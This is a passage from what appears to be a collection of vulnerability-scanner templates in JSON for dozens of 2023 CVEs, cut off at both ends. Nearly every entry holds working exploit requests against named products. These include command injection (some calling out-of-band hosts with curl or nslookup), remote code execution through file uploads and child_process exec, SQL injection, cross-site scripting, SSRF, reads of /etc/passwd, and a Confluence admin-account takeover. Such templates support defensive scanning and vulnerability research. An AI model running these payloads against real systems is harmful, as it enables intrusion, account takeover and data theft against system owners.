{{Hostname}}\n\n{\"command\":\"127.0.0.1; ls>../{{randstr}};#\",\"num\":\"230\",\"topicurl\":\"setTracerouteCfg\"}\n","GET /{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["lan_ip","reserv"],"condition":"and"},{"type":"word","part":"body_2","words":[".sh",".cgi"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35885","info":{"name":"Cloudpanel 2 < 2.3.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /file-manager/ HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\n","POST /file-manager/backend/makefile HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/&name={{str1}}.php\n","POST /file-manager/backend/text HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/{{str1}}.php&content=<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n","POST /file-manager/backend/permissions HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/{{str1}}.php&permissions=0777\n","GET /{{str1}}.php HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_5","words":["{{md5(string)}}"]}]}]},{"id":"CVE-2023-1080","info":{"name":"WordPress GN Publisher <1.5.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=gn-publisher-settings&tab=%22%2F+onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"/ onmouseover=alert(document.domain);//\")","contains(body_2, \"GN Publisher\")"],"condition":"and"}]}]},{"id":"CVE-2023-43795","info":{"name":"GeoServer WPS - Server Side Request Forgery","severity":"critical"},"requests":[{"raw":["POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<wps:Execute version=\"1.0.0\" service=\"WPS\"\n  xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n  xmlns=\"http://www.opengis.net/wps/1.0.0\"\n  xmlns:wfs=\"http://www.opengis.net/wfs\"\n  xmlns:wps=\"http://www.opengis.net/wps/1.0.0\"\n  xmlns:ows=\"http://www.opengis.net/ows/1.1\"\n  xmlns:gml=\"http://www.opengis.net/gml\"\n  xmlns:ogc=\"http://www.opengis.net/ogc\"\n  xmlns:wcs=\"http://www.opengis.net/wcs/1.1.1\"\n  xmlns:xlink=\"http://www.w3.org/1999/xlink\"\n        xsi:schemaLocation=\"http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd\">\n  <ows:Identifier>JTS:area</ows:Identifier>\n  <wps:DataInputs>\n    <wps:Input>\n      <ows:Identifier>geom</ows:Identifier>\n      <wps:Reference mimeType=\"application/json\" xlink:href=\"https://{{oast}}\" method=\"GET\">\n        <wps:Header key=\"{{string}}\" value=\"{{value}}\"/>\n      </wps:Reference>\n    </wps:Input>\n  </wps:DataInputs>\n  <wps:ResponseForm>\n    <wps:RawDataOutput>\n      <ows:Identifier>result</ows:Identifier>\n    </wps:RawDataOutput>\n  </wps:ResponseForm>\n</wps:Execute>\n"],"payloads":{"path":["/wms","/geoserver/wms"]},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http')","contains_all(to_lower(interactsh_request), '{{string}}','{{value}}')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-2227","info":{"name":"Modoboa < 2.1.0 - Improper Authorization","severity":"critical"},"requests":[{"raw":["GET /api/v2/parameters/core/ HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: 7h3h4ckv157\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["label\":","default_password\":","authentication_type\":\"local"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2272","info":{"name":"Tiempo.com <= 0.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=tiempocom%2Fapp%2Fadmin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=%22%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"Tiempo\")"],"condition":"and"}]}]},{"id":"CVE-2023-0099","info":{"name":"Simple URLs < 115 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=%3C/script%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body, \"</script><svg/onload=alert(document.domain)>\")","contains(body_2, \"search_term\")"],"condition":"and"}]}]},{"id":"CVE-2023-32117","info":{"name":"Integrate Google Drive <= 1.1.99 - Missing Authorization via REST API Endpoints","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-json/igd/v1/get-users-data"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"name\":","\"email\":","\"role\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-47684","info":{"name":"Essential Grid <= 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action=Essential_Grid_Front_request_ajax&client_action=load_post_content&postid=1&settings={%22lbMax%22:%22\\%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%22} HTTP/2\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","lightbox"],"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34754","info":{"name":"Bloofox v0.5.2.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&action=login\n","POST /admin/index.php?mode=settings&page=plugins&action=edit HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nstatus=1&pid=14'+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+Ptkr%26send%3dSave&send=Save\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","contains_all(body_2, \"Active</option>\", \"Inactive</option>\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-36845","info":{"name":"Juniper J-Web - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /?PHPRC=/dev/fd/0 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nauto_prepend_file=\"/etc/passwd\"\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"body","words":["Juniper"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34020","info":{"name":"Uncanny Toolkit for LearnDash - Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rest_route=/ult/v2/review-banner-visibility&action=maybe-later&redirect=yes&redirect_url=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2023-1020","info":{"name":"Steveas WP Live Chat Shoutbox <= 1.4.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25b","no_participation"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-33831","info":{"name":"FUXA - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /api/runscript HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"headers\": {\"normalizedNames\": {}, \"lazyUpdate\": \"null\"}, \"params\": {\"script\": {\"parameters\": [{\"name\": \"ok\", \"type\": \"tagid\", \"value\": \"\"}], \"mode\": \"\", \"id\": \"\", \"test\": \"true\", \"name\": \"ok\", \"outputId\": \"\", \"code\": \"require('child_process').exec('id > ./_images/{{filename}}')\"}}}\n","GET /_images/{{filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["Script OK:"]},{"type":"word","part":"body_2","words":["uid","gid","groups"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4148","info":{"name":"Ditty < 3.1.25 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=ditty&page=ditty_export&tab=export_ditty&\"><script>alert(/XSS/)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<script>alert(/XSS/)</script>\") && contains(body_2, \"ditty\")","contains(content_type_2, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2023-3368","info":{"name":"Chamilo LMS <= v1.11.20 Unauthenticated Command Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/main/webservices/additional_webservices.php"],"headers":{"Content-Type":"application/xml"},"body":"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ns1=\"{{BaseURL}}\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:ns2=\"http://xml.apache.org/xml-soap\" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n  <SOAP-ENV:Body>\n    <ns1:wsConvertPpt>\n      <param0 xsi:type=\"ns2:Map\">\n        <item>\n          <key xsi:type=\"xsd:string\">file_data</key>\n          <value xsi:type=\"xsd:string\"></value>\n        </item>\n        <item>\n          <key xsi:type=\"xsd:string\">file_name</key>\n          <value xsi:type=\"xsd:string\">$(curl http://{{interactsh-url}}/)</value>\n        </item>\n        <item>\n          <key xsi:type=\"xsd:string\">service_ppt2lp_size</key>\n          <value xsi:type=\"xsd:string\">720x540</value>\n        </item>\n      </param0>\n    </ns1:wsConvertPpt>\n  </SOAP-ENV:Body>\n</SOAP-ENV:Envelope>\n","matchers-condition":"and","matchers":[{"type":"status","status":[200]},{"type":"word","words":["wsConvertPptResponse"],"part":"body"},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2023-35159","info":{"name":"XWiki >= 3.4-milestone-1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain)","{{BaseURL}}/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain)"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["javascript:alert(document.domain)","deletespace.Sandbox"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200,401]}]}]},{"id":"CVE-2023-43323","info":{"name":"mooSocial 3.1.8 - External Service Interaction","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["mooConfig"],"internal":true}]},{"raw":["POST /activities/ajax_share HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n[data%5Btype%5D=User&data%5Btarget_id%5D=0&data%5Baction%5D=wall_post&data%5Bwall_photo%5D=&data%5Bsubject_type%5D=&messageText=asas&data%5BuserShareLink%5D=&data%5BuserShareVideo%5D=http://{{interactsh-url}}%2F%3Fnull&data%5BuserTagging%5D=&data%5BshareImage%5D=1&data%5Bprivacy%5D=1]\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"]}]}]},{"id":"CVE-2023-22515","info":{"name":"Atlassian Confluence - Privilege Escalation","severity":"critical"},"requests":[{"raw":["GET /setup/setupadministrator-start.action HTTP/1.1\nHost: {{Hostname}}\n","GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=0&cache{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n","GET /setup/setupadministrator-start.action HTTP/1.1\nHost: {{Hostname}}\n","@timeout:20s\nPOST /setup/setupadministrator.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nX-Atlassian-Token: no-check\n\nusername={{to_lower(username)}}&fullName=admin&email={{email}}.com&password={{password}}&confirm={{password}}&setup-next-button=Next\n","POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nX-Atlassian-Token: no-check\n\nos_username={{to_lower(username)}}&os_password={{password}}&login=Log+in&os_destination=%2Findex.action\n","GET /welcome.action HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["contains(body_1, 'Setup is already complete')","contains(body_3, 'Please configure the system administrator account for this Confluence installation')","contains(location_5, '/index.action')","status_code_5 == 302","contains(body_6, 'Administration')"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["\"USER: \"+ username","\"PASS: \"+ password"]}]}]},{"id":"CVE-2023-28343","info":{"name":"Altenergy Power Control Software C1.2.5 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /index.php/management/set_timezone HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nAccept-Encoding: gzip, deflate\nReferer: {{RootURL}}/index.php/management/datetime\n\ntimezone=`nslookup {{interactsh-url}}`\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Time Zone updated successfully"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-46574","info":{"name":"TOTOLINK A3700R - Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","internal":true,"dsl":["status_code == 200","contains(body, \"<title>TOTOLINK</title>\")"],"condition":"and"}]},{"raw":["GET /cgi-bin/cstecgi.cgi HTTP/1.1\nHost: {{Hostname}}\n\n{\"topicurl\":\"UploadFirmwareFile\",\"FileName\":\";id\"}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0600","info":{"name":"WP Visitor Statistics (Real Time Traffic) < 6.9 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Real Time Traffic"]}]},{"raw":["@timeout: 30s\nGET /?wmcAction=wmcTrack&siteId=34&url=test&uid=01&pid=02&visitorId={{str}}%27,sleep(6),0,0,0,0,0);--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"sleep(6)\")"],"condition":"and"}]}]},{"id":"CVE-2023-22480","info":{"name":"KubeOperator Foreground `kubeconfig` - File Download","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/clusters/kubeconfig/k8s"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apiVersion:","clusters:"],"condition":"and"},{"type":"word","part":"header","words":["application/download"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2479","info":{"name":"Appium Desktop Server - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?url=<img/src=\"http://{{interactsh-url}}\">"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["The requested resource could not be found, or a request was received using an HTTP method that is not supported by the mapped resource"]},{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2023-0678","info":{"name":"PHPIPAM <v1.5.1 - Missing Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/functions/scripts/find_full_subnets.php"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"Array\", \"[subnet]\", \"[description]\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-26067","info":{"name":"Lexmark Printers - Command Injection","severity":"high"},"requests":[{"raw":["POST /cgi-bin/fax_change_faxtrace_settings HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Length: 49\n\nFT_Custom_lbtrace=$({{cmd}})\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'dns')","contains(body, 'Fax Trace Settings')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-40355","info":{"name":"Axigen WebMail - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.hsp?passwordExpired=yes&username=\\'-alert(document.domain),//","{{BaseURL}}/index.hsp?passwordExpired=yes&domainName=\\'-alert(document.domain),//","{{BaseURL}}/index.hsp?m=',alert(document.domain),'"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\\\\'-alert(document.domain),//","',alert(document.domain),'"],"condition":"or"},{"type":"dsl","dsl":["contains(header, \"text/html\")","contains(response, \"Axigen\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-2356","info":{"name":"Mlflow <2.3.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{str}}\"}\n","POST /api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{str}}\", \"source\": \"file://{{Hostname}}/../../../../../../../\"}\n","GET /model-versions/get-artifact?path=etc/passwd&name={{str}}&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-36844","info":{"name":"Juniper Devices - Remote Code Execution","severity":"medium"},"requests":[{"raw":["POST /webauth_operation.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nrs=do_upload&rsargs[]=[{\"fileData\": \"data:text/html;base64,{{base64(payload)}}\", \"fileName\": \"{{rand_base(5, \"abc\")}}.php\", \"csize\": {{len(payload)}}}]\n","POST /webauth_operation.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nrs=do_upload&rsargs[]=[{\"fileName\": \"{{rand_base(5, \"abc\")}}.ini\", \"fileData\": \"data:text/html;base64,{{base64(concat('auto_prepend_file=',hex_decode('22'),'/var/tmp/',phpfile,hex_decode('22')))}}\", \"csize\": \"97\" }]\n","GET /webauth_operation.php?PHPRC=/var/tmp/{{inifile}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["\"original_fileName\":","\"converted_fileName\":"],"condition":"and"},{"type":"word","part":"body_3","words":["{{md5(string)}}"]}],"extractors":[{"type":"regex","part":"body_1","name":"phpfile","regex":["([a-f0-9]{64}\\.php)"],"internal":true},{"type":"regex","part":"body_2","name":"inifile","regex":["([a-f0-9]{64}\\.ini)"],"internal":true}]}]},{"id":"CVE-2023-4174","info":{"name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/index?q=\"><img+src=a+onerror=alert(document.domain)>ridxm","{{BaseURL}}/stores\"><img+src=a+onerror=alert(document.domain)>ridxm/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recent","{{BaseURL}}/user_info\"><img+src=a+onerror=alert(document.domain)>ridxm/index/friends","{{BaseURL}}/faqs\"><img+src=a+onerror=alert(document.domain)>ridxm/index?content_search=\"><img+src=a+onerror=alert(document.domain)>ridxm","{{BaseURL}}/classifieds\"><img+src=a+onerror=alert(document.domain)>ridxm/search?category=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert(document.domain)>ridxm","mooSocial"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2023-33405","info":{"name":"BlogEngine CMS - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/default.aspx?years=http://oast.pro"],"matchers":[{"type":"regex","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.pro.*$"],"part":"header"}]}]},{"id":"CVE-2023-24735","info":{"name":"PMB 7.4.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pmb/opac_css/pmb.php?url=https://oast.me&hash={{md5('https://oast.me')}}"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2023-1263","info":{"name":"Coming Soon & Maintenance < 4.1.7 - Unauthenticated Post/Page Access","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=cmp_get_post_detail&id=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"img\":","\"date\":","\"title\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2780","info":{"name":"Mlflow <2.3.1 - Local File Inclusion Bypass","severity":"critical"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\",\"source\":\"file://./etc\"}\n","GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-22478","info":{"name":"KubePi <= v1.6.4 LoginLogsSearch - Unauthorized Access","severity":"high"},"requests":[{"raw":["@timeout 10\nPOST /kubepi/api/v1/systems/login/logs/search?pageNum=1&&pageSize=10 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"apiVersion\":","\"uuid\":","\"userName\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-5089","info":{"name":"Defender Security < 4.1.0 - Protection Bypass (Hidden Login Page)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?gf_page=randomstring"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(location), 'wp-login.php')"]},{"type":"word","part":"header","words":["%2F%3Fgf_page%3Drandomstring&reauth=1"]}],"extractors":[{"type":"kval","kval":["location"]}]}]},{"id":"CVE-2023-44812","info":{"name":"mooSocial v.3.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","part":"body","words":["mooSocial"],"internal":true,"case-insensitive":true}]},{"method":"GET","path":["{{BaseURL}}/admin/home/login?admin_redirect_url=aHR0cDovL2xvY2FsaG9zdC9tb29zb2NpYWwvYWRtaW4vcGx1Z2lucw%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3etest"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-5003","info":{"name":"Active Directory Integration WP Plugin < 4.1.10 - Log Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/ldap-authentication-report.csv"],"matchers-condition":"and","matchers":[{"type":"word","words":["ID","USERNAME","TIME","LDAP STATUS"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-33338","info":{"name":"Old Age Home Management System v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=vaday%27+or+1%3D1%23&password=password&submit=\n","GET /admin/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"Change Password\")","contains(body_2, \"Old Age Home Management System|| Dashboard\")"],"condition":"and"}]}]},{"id":"CVE-2023-40779","info":{"name":"IceWarp Mail Server Deep Castle 2 v.13.0.1.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5coast.pro/%2f%2e%2e"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.pro.*$"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2023-35813","info":{"name":"Sitecore - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{{url_encode(payload)}}\")\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type, '{{string}}')","contains_all(body, 'commands', 'command', 'value')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-34751","info":{"name":"bloofoxCMS v0.5.2.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&action=login\n","@timeout: 10s\nPOST /admin/index.php?mode=user&page=groups&action=edit HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname=User&backend=0&content=0&settings=0&permissions=0&tools=0&demo=0&gid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&name_old=User&send=Save\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","contains(header_2, \"text/html\")","contains(body_2, 'bloofoxCMS Admincenter')"],"condition":"and"}]}]},{"id":"CVE-2023-23161","info":{"name":"Art Gallery Management System Project v1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["center\"><img src=1 onerror=alert(document.domain)>","Art Type"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-46818","info":{"name":"ISPConfig - PHP Code Injection","severity":"high"},"requests":[{"raw":["POST /login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 